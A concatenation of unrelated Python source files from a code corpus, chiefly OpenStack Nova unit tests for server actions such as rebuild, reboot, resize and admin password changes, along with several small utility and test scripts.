| alxgu/ansible | lib/ansible/modules/cloud/amazon/lambda_facts.py | Python | gpl-3.0 | 13,097 | 0.003054 |
from circularbuffer import CircularBuffer
from pytest import raises
def test_index():
buf = CircularBuffer(32)
buf.write(b'asdf\r\njkl;\r\n1234\r\n')
assert buf.index(b'\r\n') == 4
assert buf.index(b'\r\n', 5) == 10
with raises(ValueError):
buf.index(b'x')
buf.clear()
buf.write(b'asdf\r\njkl;\r\n1234\r\na')
assert buf.index(b'\r\n') == 4
assert buf.index(b'\r\n', 5) == 10
with raises(ValueError):
buf.index(b'x')
with raises(ValueError):
buf.index(b'')
| dozymoe/PyCircularBuffer | tests/test_index.py | Python | mit | 527 | 0.001898 |
import rpw
from pyrevit.script import get_logger
logger = get_logger()
selection = rpw.ui.Selection()
# TODO check in only one loop
number_of_unused_connectors = sum([element.ConnectorManager.UnusedConnectors.Size for element in selection])
logger.debug(number_of_unused_connectors)
if number_of_unused_connectors > 2:
rpw.ui.forms.Alert('Please select only one loop')
for element in selection:
element.ConnectorManager.UnusedConnectors
| CyrilWaechter/pyRevitMEP | pyRevitMEP.tab/Lab.panel/Lab.pulldown/ConvertToFlexPipe.pushbutton/script.py | Python | gpl-3.0 | 451 | 0.004435 |
from elan import *
#Set System description
#Finished
Viewer.Start()
Viewer.CloseAndClean()
Configurator.Start()
Configurator.basicinformation.Click()
Configurator.systemname.Wait()
sleep(1)
Configurator.Edit.SetText(2,"Changed")
Configurator.apply.Wait()
Configurator.apply.Click()
Configurator.RestartHard()
Configurator.WaitForControllerToComeBackOnline()
Configurator.Start()
Configurator.basicinformation.Click()
Configurator.systemdescriptionchangedset.Wait()
Configurator.Edit.SetText(2," ")
Configurator.apply.Wait()
Configurator.apply.Click()
Configurator.CloseAndClean()
print(' Finished') | kenshay/ImageScript | ProgramData/SystemFiles/Python/Lib/site-packages/elan/Pools/Quick_Tests/7____Set_System_Description_Restart_Check___.py | Python | gpl-3.0 | 639 | 0.007825 |
#!/usr/bin/env python3
import inspect
from classes.rgams_SRS import rgams_SRS
from classes.selectorvalve_VICI import selectorvalve_VICI
from classes.selectorvalve_compositeVICI import selectorvalve_compositeVICI
from classes.pressuresensor_WIKA import pressuresensor_WIKA
from classes.pressuresensor_OMEGA import pressuresensor_OMEGA
from classes.temperaturesensor_MAXIM import temperaturesensor_MAXIM
from classes.datafile import datafile
from classes.misc import misc
CLASSES = [ rgams_SRS , selectorvalve_VICI , selectorvalve_compositeVICI , pressuresensor_WIKA , pressuresensor_OMEGA , temperaturesensor_MAXIM , datafile , misc ]
outfile = open('python_API.tex', 'w')
outfile.write( '%% THIS NEEDS THE underscore PACKAGE: \\usepackage[strings]{underscore}\n\n' )
for X in CLASSES:
outfile.write ( '\subsubsection{Class \\texttt{' + X.__name__ + '}}\n' )
P = inspect.getsourcefile(X)
outfile.write ( '\path{' + P[P.find('python'):len(P)] + '}\par\n' )
doc = inspect.getdoc(X)
if doc is None:
outfile.write ( 'No class description available.\par' )
else:
# outfile.write ( '\\texttt{' + inspect.getdoc(X) + '+\n' )
outfile.write ( inspect.getdoc(X) + '\par' )
outfile.write ( '\n\n' )
for name, data in inspect.getmembers(X):
if name[0:2] == '__' :
continue
if name == '__doc__':
continue
if name == '__init__':
continue
if name == '__module__':
continue
outfile.write ( '\paragraph{Method \\texttt{' + name + '}}\n\\vspace{1ex}\n' )
exec ( 'doc = ' + X.__name__ + '.' + name + '.__doc__' )
if doc is None:
outfile.write ( 'No method description available.\par' )
else:
u = ''
for line in doc.splitlines():
u = u + line.lstrip() + '\\newline\n'
outfile.write ( '\\texttt{' + u + '}' )
outfile.write ( '\n\n' )
outfile.close()
| brennmat/ruediPy | documentation/ruediPy/list_python_API.py | Python | gpl-3.0 | 1,842 | 0.050489 |
import scipy.cluster.hierarchy as hcl
from scipy.spatial.distance import squareform
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
from scipy.cluster.hierarchy import dendrogram
import scipy
import json
#data = pd.read_json(path_or_buf= 'C:\Users\davtalab\Desktop\outJSON.json')
parsed_json = json.loads(open('C:\Users\davtalab\Desktop\data.json').read())
print parsed_json[1]['id']
| skashyap7/polar.usc.edu | html/team25ev/similarity_clustering/read_json.py | Python | apache-2.0 | 416 | 0.012019 |
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import uuid
import mock
import mox
from oslo.config import cfg
import webob
from nova.api.openstack.compute import servers
from nova.compute import api as compute_api
from nova.compute import task_states
from nova.compute import vm_states
from nova import context
from nova import db
from nova import exception
from nova.image import glance
from nova import objects
from nova.openstack.common import jsonutils
from nova.openstack.common import uuidutils
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import fake_block_device
from nova.tests import fake_instance
from nova.tests.image import fake
from nova.tests import matchers
from nova.tests import utils
CONF = cfg.CONF
CONF.import_opt('password_length', 'nova.utils')
FAKE_UUID = fakes.FAKE_UUID
INSTANCE_IDS = {FAKE_UUID: 1}
def return_server_not_found(*arg, **kwarg):
raise exception.NotFound()
def instance_update_and_get_original(context, instance_uuid, values,
update_cells=True,
columns_to_join=None,
):
inst = fakes.stub_instance(INSTANCE_IDS[instance_uuid], host='fake_host')
inst = dict(inst, **values)
return (inst, inst)
def instance_update(context, instance_uuid, kwargs, update_cells=True):
inst = fakes.stub_instance(INSTANCE_IDS[instance_uuid], host='fake_host')
return inst
class MockSetAdminPassword(object):
def __init__(self):
self.instance_id = None
self.password = None
def __call__(self, context, instance, password):
self.instance_id = instance['uuid']
self.password = password
class ServerActionsControllerTest(test.TestCase):
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
image_href = 'http://localhost/v2/fake/images/%s' % image_uuid
def setUp(self):
super(ServerActionsControllerTest, self).setUp()
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE,
host='fake_host'))
self.stubs.Set(db, 'instance_update_and_get_original',
instance_update_and_get_original)
fakes.stub_out_nw_api(self.stubs)
fakes.stub_out_compute_api_snapshot(self.stubs)
fake.stub_out_image_service(self.stubs)
self.flags(allow_instance_snapshots=True,
enable_instance_password=True)
self.uuid = FAKE_UUID
self.url = '/v2/fake/servers/%s/action' % self.uuid
self._image_href = '155d900f-4e14-4e4c-a73d-069cbf4541e6'
class FakeExtManager(object):
def is_loaded(self, ext):
return False
self.controller = servers.Controller(ext_mgr=FakeExtManager())
self.compute_api = self.controller.compute_api
self.context = context.RequestContext('fake', 'fake')
self.app = fakes.wsgi_app(init_only=('servers',),
fake_auth_context=self.context)
def _make_request(self, url, body):
req = webob.Request.blank('/v2/fake' + url)
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.content_type = 'application/json'
return req.get_response(self.app)
def _stub_instance_get(self, uuid=None):
self.mox.StubOutWithMock(compute_api.API, 'get')
if uuid is None:
uuid = uuidutils.generate_uuid()
instance = fake_instance.fake_db_instance(
id=1, uuid=uuid, vm_state=vm_states.ACTIVE, task_state=None)
instance = objects.Instance._from_db_object(
self.context, objects.Instance(), instance)
self.compute_api.get(self.context, uuid,
want_objects=True).AndReturn(instance)
return instance
def _test_locked_instance(self, action, method=None, body_map=None,
compute_api_args_map=None):
if method is None:
method = action
if body_map is None:
body_map = {}
if compute_api_args_map is None:
compute_api_args_map = {}
instance = self._stub_instance_get()
args, kwargs = compute_api_args_map.get(action, ((), {}))
getattr(compute_api.API, method)(self.context, instance,
*args, **kwargs).AndRaise(
exception.InstanceIsLocked(instance_uuid=instance['uuid']))
self.mox.ReplayAll()
res = self._make_request('/servers/%s/action' % instance['uuid'],
{action: body_map.get(action)})
self.assertEqual(409, res.status_int)
# Do these here instead of tearDown because this method is called
# more than once for the same test case
self.mox.VerifyAll()
self.mox.UnsetStubs()
def test_actions_with_locked_instance(self):
actions = ['resize', 'confirmResize', 'revertResize', 'reboot',
'rebuild']
method_translations = {'confirmResize': 'confirm_resize',
'revertResize': 'revert_resize'}
body_map = {'resize': {'flavorRef': '2'},
'reboot': {'type': 'HARD'},
'rebuild': {'imageRef': self.image_uuid,
'adminPass': 'TNc53Dr8s7vw'}}
args_map = {'resize': (('2'), {}),
'confirmResize': ((), {}),
'reboot': (('HARD',), {}),
'rebuild': ((self.image_uuid, 'TNc53Dr8s7vw'),
{'files_to_inject': None})}
for action in actions:
method = method_translations.get(action)
self.mox.StubOutWithMock(compute_api.API, method or action)
self._test_locked_instance(action, method=method,
body_map=body_map,
compute_api_args_map=args_map)
def test_server_change_password(self):
mock_method = MockSetAdminPassword()
self.stubs.Set(compute_api.API, 'set_admin_password', mock_method)
body = {'changePassword': {'adminPass': '1234pass'}}
req = fakes.HTTPRequest.blank(self.url)
self.controller._action_change_password(req, FAKE_UUID, body)
self.assertEqual(mock_method.instance_id, self.uuid)
self.assertEqual(mock_method.password, '1234pass')
def test_server_change_password_pass_disabled(self):
# run with enable_instance_password disabled to verify adminPass
# is missing from response. See lp bug 921814
self.flags(enable_instance_password=False)
mock_method = MockSetAdminPassword()
self.stubs.Set(compute_api.API, 'set_admin_password', mock_method)
body = {'changePassword': {'adminPass': '1234pass'}}
req = fakes.HTTPRequest.blank(self.url)
self.controller._action_change_password(req, FAKE_UUID, body)
self.assertEqual(mock_method.instance_id, self.uuid)
# note,the mock still contains the password.
self.assertEqual(mock_method.password, '1234pass')
def test_server_change_password_not_a_string(self):
body = {'changePassword': {'adminPass': 1234}}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_change_password,
req, FAKE_UUID, body)
def test_server_change_password_bad_request(self):
body = {'changePassword': {'pass': '12345'}}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_change_password,
req, FAKE_UUID, body)
def test_server_change_password_empty_string(self):
mock_method = MockSetAdminPassword()
self.stubs.Set(compute_api.API, 'set_admin_password', mock_method)
body = {'changePassword': {'adminPass': ''}}
req = fakes.HTTPRequest.blank(self.url)
self.controller._action_change_password(req, FAKE_UUID, body)
self.assertEqual(mock_method.instance_id, self.uuid)
self.assertEqual(mock_method.password, '')
def test_server_change_password_none(self):
body = {'changePassword': {'adminPass': None}}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_change_password,
req, FAKE_UUID, body)
def test_reboot_hard(self):
body = dict(reboot=dict(type="HARD"))
req = fakes.HTTPRequest.blank(self.url)
self.controller._action_reboot(req, FAKE_UUID, body)
def test_reboot_soft(self):
body = dict(reboot=dict(type="SOFT"))
req = fakes.HTTPRequest.blank(self.url)
self.controller._action_reboot(req, FAKE_UUID, body)
def test_reboot_incorrect_type(self):
body = dict(reboot=dict(type="NOT_A_TYPE"))
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_reboot,
req, FAKE_UUID, body)
def test_reboot_missing_type(self):
body = dict(reboot=dict())
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_reboot,
req, FAKE_UUID, body)
def test_reboot_none(self):
body = dict(reboot=dict(type=None))
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_reboot,
req, FAKE_UUID, body)
def test_reboot_not_found(self):
self.stubs.Set(db, 'instance_get_by_uuid',
return_server_not_found)
body = dict(reboot=dict(type="HARD"))
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller._action_reboot,
req, str(uuid.uuid4()), body)
def test_reboot_raises_conflict_on_invalid_state(self):
body = dict(reboot=dict(type="HARD"))
def fake_reboot(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stubs.Set(compute_api.API, 'reboot', fake_reboot)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_reboot,
req, FAKE_UUID, body)
def test_reboot_soft_with_soft_in_progress_raises_conflict(self):
body = dict(reboot=dict(type="SOFT"))
req = fakes.HTTPRequest.blank(self.url)
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING))
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_reboot,
req, FAKE_UUID, body)
def test_reboot_hard_with_soft_in_progress_does_not_raise(self):
body = dict(reboot=dict(type="HARD"))
req = fakes.HTTPRequest.blank(self.url)
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING))
self.controller._action_reboot(req, FAKE_UUID, body)
def test_reboot_hard_with_hard_in_progress_raises_conflict(self):
body = dict(reboot=dict(type="HARD"))
req = fakes.HTTPRequest.blank(self.url)
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING_HARD))
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_reboot,
req, FAKE_UUID, body)
def test_rebuild_preserve_ephemeral_is_ignored_when_ext_not_loaded(self):
return_server = fakes.fake_instance_get(image_ref='2',
vm_state=vm_states.ACTIVE,
host='fake_host')
self.stubs.Set(db, 'instance_get_by_uuid', return_server)
body = {
"rebuild": {
"imageRef": self._image_href,
"preserve_ephemeral": False,
},
}
req = fakes.HTTPRequest.blank(self.url)
context = req.environ['nova.context']
self.mox.StubOutWithMock(compute_api.API, 'rebuild')
compute_api.API.rebuild(context, mox.IgnoreArg(), self._image_href,
mox.IgnoreArg(), files_to_inject=None)
self.mox.ReplayAll()
self.controller._action_rebuild(req, FAKE_UUID, body)
def _test_rebuild_preserve_ephemeral(self, value=None):
def fake_is_loaded(ext):
return ext == 'os-preserve-ephemeral-rebuild'
self.stubs.Set(self.controller.ext_mgr, 'is_loaded', fake_is_loaded)
return_server = fakes.fake_instance_get(image_ref='2',
vm_state=vm_states.ACTIVE,
host='fake_host')
self.stubs.Set(db, 'instance_get_by_uuid', return_server)
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
if value is not None:
body['rebuild']['preserve_ephemeral'] = value
req = fakes.HTTPRequest.blank(self.url)
context = req.environ['nova.context']
self.mox.StubOutWithMock(compute_api.API, 'rebuild')
if value is not None:
compute_api.API.rebuild(context, mox.IgnoreArg(), self._image_href,
mox.IgnoreArg(), preserve_ephemeral=value,
files_to_inject=None)
else:
compute_api.API.rebuild(context, mox.IgnoreArg(), self._image_href,
mox.IgnoreArg(), files_to_inject=None)
self.mox.ReplayAll()
self.controller._action_rebuild(req, FAKE_UUID, body)
def test_rebuild_preserve_ephemeral_true(self):
self._test_rebuild_preserve_ephemeral(True)
def test_rebuild_preserve_ephemeral_false(self):
self._test_rebuild_preserve_ephemeral(False)
def test_rebuild_preserve_ephemeral_default(self):
self._test_rebuild_preserve_ephemeral()
def test_rebuild_accepted_minimum(self):
return_server = fakes.fake_instance_get(image_ref='2',
vm_state=vm_states.ACTIVE, host='fake_host')
self.stubs.Set(db, 'instance_get_by_uuid', return_server)
self_href = 'http://localhost/v2/fake/servers/%s' % FAKE_UUID
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
req = fakes.HTTPRequest.blank(self.url)
robj = self.controller._action_rebuild(req, FAKE_UUID, body)
body = robj.obj
self.assertEqual(body['server']['image']['id'], '2')
self.assertEqual(len(body['server']['adminPass']),
CONF.password_length)
self.assertEqual(robj['location'], self_href)
def test_rebuild_instance_with_image_uuid(self):
info = dict(image_href_in_call=None)
def rebuild(self2, context, instance, image_href, *args, **kwargs):
info['image_href_in_call'] = image_href
self.stubs.Set(db, 'instance_get',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE))
self.stubs.Set(compute_api.API, 'rebuild', rebuild)
# proper local hrefs must start with 'http://localhost/v2/'
body = {
'rebuild': {
'imageRef': self.image_uuid,
},
}
req = fakes.HTTPRequest.blank('/v2/fake/servers/a/action')
self.controller._action_rebuild(req, FAKE_UUID, body)
self.assertEqual(info['image_href_in_call'], self.image_uuid)
def test_rebuild_instance_with_image_href_uses_uuid(self):
info = dict(image_href_in_call=None)
def rebuild(self2, context, instance, image_href, *args, **kwargs):
info['image_href_in_call'] = image_href
self.stubs.Set(db, 'instance_get',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE))
self.stubs.Set(compute_api.API, 'rebuild', rebuild)
# proper local hrefs must start with 'http://localhost/v2/'
body = {
'rebuild': {
'imageRef': self.image_href,
},
}
req = fakes.HTTPRequest.blank('/v2/fake/servers/a/action')
self.controller._action_rebuild(req, FAKE_UUID, body)
self.assertEqual(info['image_href_in_call'], self.image_uuid)
def test_rebuild_accepted_minimum_pass_disabled(self):
# run with enable_instance_password disabled to verify adminPass
# is missing from response. See lp bug 921814
self.flags(enable_instance_password=False)
return_server = fakes.fake_instance_get(image_ref='2',
vm_state=vm_states.ACTIVE, host='fake_host')
self.stubs.Set(db, 'instance_get_by_uuid', return_server)
self_href = 'http://localhost/v2/fake/servers/%s' % FAKE_UUID
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
req = fakes.HTTPRequest.blank(self.url)
robj = self.controller._action_rebuild(req, FAKE_UUID, body)
body = robj.obj
self.assertEqual(body['server']['image']['id'], '2')
self.assertNotIn("adminPass", body['server'])
self.assertEqual(robj['location'], self_href)
def test_rebuild_raises_conflict_on_invalid_state(self):
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
def fake_rebuild(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stubs.Set(compute_api.API, 'rebuild', fake_rebuild)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_rebuild,
req, FAKE_UUID, body)
def test_rebuild_accepted_with_metadata(self):
metadata = {'new': 'metadata'}
return_server = fakes.fake_instance_get(metadata=metadata,
vm_state=vm_states.ACTIVE, host='fake_host')
self.stubs.Set(db, 'instance_get_by_uuid', return_server)
body = {
"rebuild": {
"imageRef": self._image_href,
"metadata": metadata,
},
}
req = fakes.HTTPRequest.blank(self.url)
body = self.controller._action_rebuild(req, FAKE_UUID, body).obj
self.assertEqual(body['server']['metadata'], metadata)
def test_rebuild_accepted_with_bad_metadata(self):
body = {
"rebuild": {
"imageRef": self._image_href,
"metadata": "stack",
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
req, FAKE_UUID, body)
def test_rebuild_with_too_large_metadata(self):
body = {
"rebuild": {
"imageRef": self._image_href,
"metadata": {
256 * "k": "value"
}
}
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller._action_rebuild, req,
FAKE_UUID, body)
def test_rebuild_bad_entity(self):
body = {
"rebuild": {
"imageId": self._image_href,
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
req, FAKE_UUID, body)
def test_rebuild_bad_personality(self):
body = {
"rebuild": {
"imageRef": self._image_href,
"personality": [{
"path": "/path/to/file",
"contents": "INVALID b64",
}]
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
req, FAKE_UUID, body)
def test_rebuild_personality(self):
body = {
"rebuild": {
"imageRef": self._image_href,
"personality": [{
"path": "/path/to/file",
"contents": base64.b64encode("Test String"),
}]
},
}
req = fakes.HTTPRequest.blank(self.url)
body = self.controller._action_rebuild(req, FAKE_UUID, body).obj
self.assertNotIn('personality', body['server'])
def test_rebuild_admin_pass(self):
return_server = fakes.fake_instance_get(image_ref='2',
vm_state=vm_states.ACTIVE, host='fake_host')
self.stubs.Set(db, 'instance_get_by_uuid', return_server)
body = {
"rebuild": {
"imageRef": self._image_href,
"adminPass": "asdf",
},
}
req = fakes.HTTPRequest.blank(self.url)
body = self.controller._action_rebuild(req, FAKE_UUID, body).obj
self.assertEqual(body['server']['image']['id'], '2')
self.assertEqual(body['server']['adminPass'], 'asdf')
def test_rebuild_admin_pass_pass_disabled(self):
# run with enable_instance_password disabled to verify adminPass
# is missing from response. See lp bug 921814
self.flags(enable_instance_password=False)
return_server = fakes.fake_instance_get(image_ref='2',
vm_state=vm_states.ACTIVE, host='fake_host')
self.stubs.Set(db, 'instance_get_by_uuid', return_server)
body = {
"rebuild": {
"imageRef": self._image_href,
"adminPass": "asdf",
},
}
req = fakes.HTTPRequest.blank(self.url)
body = self.controller._action_rebuild(req, FAKE_UUID, body).obj
self.assertEqual(body['server']['image']['id'], '2')
self.assertNotIn('adminPass', body['server'])
def test_rebuild_server_not_found(self):
def server_not_found(self, instance_id,
columns_to_join=None, use_slave=False):
raise exception.InstanceNotFound(instance_id=instance_id)
self.stubs.Set(db, 'instance_get_by_uuid', server_not_found)
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller._action_rebuild,
req, FAKE_UUID, body)
def test_rebuild_with_bad_image(self):
body = {
"rebuild": {
"imageRef": "foo",
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
req, FAKE_UUID, body)
def test_rebuild_accessIP(self):
attributes = {
'access_ip_v4': '172.19.0.1',
'access_ip_v6': 'fe80::1',
}
body = {
"rebuild": {
"imageRef": self._image_href,
"accessIPv4": "172.19.0.1",
"accessIPv6": "fe80::1",
},
}
data = {'changes': {}}
orig_get = compute_api.API.get
def wrap_get(*args, **kwargs):
data['instance'] = orig_get(*args, **kwargs)
return data['instance']
def fake_save(context, **kwargs):
data['changes'].update(data['instance'].obj_get_changes())
self.stubs.Set(compute_api.API, 'get', wrap_get)
self.stubs.Set(objects.Instance, 'save', fake_save)
req = fakes.HTTPRequest.blank(self.url)
self.controller._action_rebuild(req, FAKE_UUID, body)
self.assertEqual(self._image_href, data['changes']['image_ref'])
self.assertEqual("", data['changes']['kernel_id'])
self.assertEqual("", data['changes']['ramdisk_id'])
self.assertEqual(task_states.REBUILDING, data['changes']['task_state'])
self.assertEqual(0, data['changes']['progress'])
for attr, value in attributes.items():
self.assertEqual(value, str(data['changes'][attr]))
def test_rebuild_when_kernel_not_exists(self):
def return_image_meta(*args, **kwargs):
image_meta_table = {
'2': {'id': 2, 'status': 'active', 'container_format': 'ari'},
'155d900f-4e14-4e4c-a73d-069cbf4541e6':
{'id': 3, 'status': 'active', 'container_format': 'raw',
'properties': {'kernel_id': 1, 'ramdisk_id': 2}},
}
image_id = args[2]
try:
image_meta = image_meta_table[str(image_id)]
except KeyError:
raise exception.ImageNotFound(image_id=image_id)
return image_meta
self.stubs.Set(fake._FakeImageService, 'show', return_image_meta)
body = {
"rebuild": {
"imageRef": "155d900f-4e14-4e4c-a73d-069cbf4541e6",
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
req, FAKE_UUID, body)
def test_rebuild_proper_kernel_ram(self):
instance_meta = {'kernel_id': None, 'ramdisk_id': None}
orig_get = compute_api.API.get
def wrap_get(*args, **kwargs):
inst = orig_get(*args, **kwargs)
instance_meta['instance'] = inst
return inst
def fake_save(context, **kwargs):
instance = instance_meta['instance']
for key in instance_meta.keys():
if key in instance.obj_what_changed():
instance_meta[key] = instance[key]
def return_image_meta(*args, **kwargs):
image_meta_table = {
'1': {'id': 1, 'status': 'active', 'container_format': 'aki'},
'2': {'id': 2, 'status': 'active', 'container_format': 'ari'},
'155d900f-4e14-4e4c-a73d-069cbf4541e6':
{'id': 3, 'status': 'active', 'container_format': 'raw',
'properties': {'kernel_id': 1, 'ramdisk_id': 2}},
}
image_id = args[2]
try:
image_meta = image_meta_table[str(image_id)]
except KeyError:
raise exception.ImageNotFound(image_id=image_id)
return image_meta
self.stubs.Set(fake._FakeImageService, 'show', return_image_meta)
self.stubs.Set(compute_api.API, 'get', wrap_get)
self.stubs.Set(objects.Instance, 'save', fake_save)
body = {
"rebuild": {
"imageRef": "155d900f-4e14-4e4c-a73d-069cbf4541e6",
},
}
req = fakes.HTTPRequest.blank(self.url)
self.controller._action_rebuild(req, FAKE_UUID, body).obj
self.assertEqual(instance_meta['kernel_id'], '1')
self.assertEqual(instance_meta['ramdisk_id'], '2')
@mock.patch.object(compute_api.API, 'rebuild')
def test_rebuild_instance_raise_auto_disk_config_exc(self, mock_rebuild):
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
req = fakes.HTTPRequest.blank(self.url)
mock_rebuild.side_effect = exception.AutoDiskConfigDisabledByImage(
image='dummy')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
req, FAKE_UUID, body)
def test_resize_server(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.resize_called = False
def resize_mock(*args):
self.resize_called = True
self.stubs.Set(compute_api.API, 'resize', resize_mock)
req = fakes.HTTPRequest.blank(self.url)
body = self.controller._action_resize(req, FAKE_UUID, body)
self.assertEqual(self.resize_called, True)
def test_resize_server_no_flavor(self):
body = dict(resize=dict())
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
req, FAKE_UUID, body)
def test_resize_server_no_flavor_ref(self):
body = dict(resize=dict(flavorRef=None))
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
req, FAKE_UUID, body)
def test_resize_with_server_not_found(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.stubs.Set(compute_api.API, 'get', return_server_not_found)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller._action_resize,
req, FAKE_UUID, body)
def test_resize_with_image_exceptions(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.resize_called = 0
image_id = 'fake_image_id'
exceptions = [
(exception.ImageNotAuthorized(image_id=image_id),
webob.exc.HTTPUnauthorized),
(exception.ImageNotFound(image_id=image_id),
webob.exc.HTTPBadRequest),
(exception.Invalid, webob.exc.HTTPBadRequest),
(exception.NoValidHost(reason='Bad host'),
webob.exc.HTTPBadRequest),
(exception.AutoDiskConfigDisabledByImage(image=image_id),
webob.exc.HTTPBadRequest),
]
raised, expected = map(iter, zip(*exceptions))
def _fake_resize(obj, context, instance, flavor_id):
self.resize_called += 1
raise raised.next()
self.stubs.Set(compute_api.API, 'resize', _fake_resize)
for call_no in range(len(exceptions)):
req = fakes.HTTPRequest.blank(self.url)
next_exception = expected.next()
actual = self.assertRaises(next_exception,
self.controller._action_resize,
req, FAKE_UUID, body)
if (isinstance(exceptions[call_no][0],
exception.NoValidHost)):
self.assertEqual(actual.explanation,
'No valid host was found. Bad host')
elif (isinstance(exceptions[call_no][0],
exception.AutoDiskConfigDisabledByImage)):
self.assertEqual(actual.explanation,
'Requested image fake_image_id has automatic'
' disk resize disabled.')
self.assertEqual(self.resize_called, call_no + 1)
@mock.patch('nova.compute.api.API.resize',
side_effect=exception.CannotResizeDisk(reason=''))
def test_resize_raises_cannot_resize_disk(self, mock_resize):
body = dict(resize=dict(flavorRef="http://localhost/3"))
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
req, FAKE_UUID, body)
@mock.patch('nova.compute.api.API.resize',
side_effect=exception.FlavorNotFound(reason='',
flavor_id='fake_id'))
def test_resize_raises_flavor_not_found(self, mock_resize):
body = dict(resize=dict(flavorRef="http://localhost/3"))
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
req, FAKE_UUID, body)
def test_resize_with_too_many_instances(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
def fake_resize(*args, **kwargs):
raise exception.TooManyInstances(message="TooManyInstance")
self.stubs.Set(compute_api.API, 'resize', fake_resize)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPForbidden,
self.controller._action_resize,
req, FAKE_UUID, body)
def test_resize_raises_conflict_on_invalid_state(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
def fake_resize(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stubs.Set(compute_api.API, 'resize', fake_resize)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_resize,
req, FAKE_UUID, body)
@mock.patch('nova.compute.api.API.resize',
side_effect=exception.NoValidHost(reason=''))
def test_resize_raises_no_valid_host(self, mock_resize):
body = dict(resize=dict(flavorRef="http://localhost/3"))
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
req, FAKE_UUID, body)
@mock.patch.object(compute_api.API, 'resize')
def test_resize_instance_raise_auto_disk_config_exc(self, mock_resize):
mock_resize.side_effect = exception.AutoDiskConfigDisabledByImage(
image='dummy')
body = dict(resize=dict(flavorRef="http://localhost/3"))
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
req, FAKE_UUID, body)
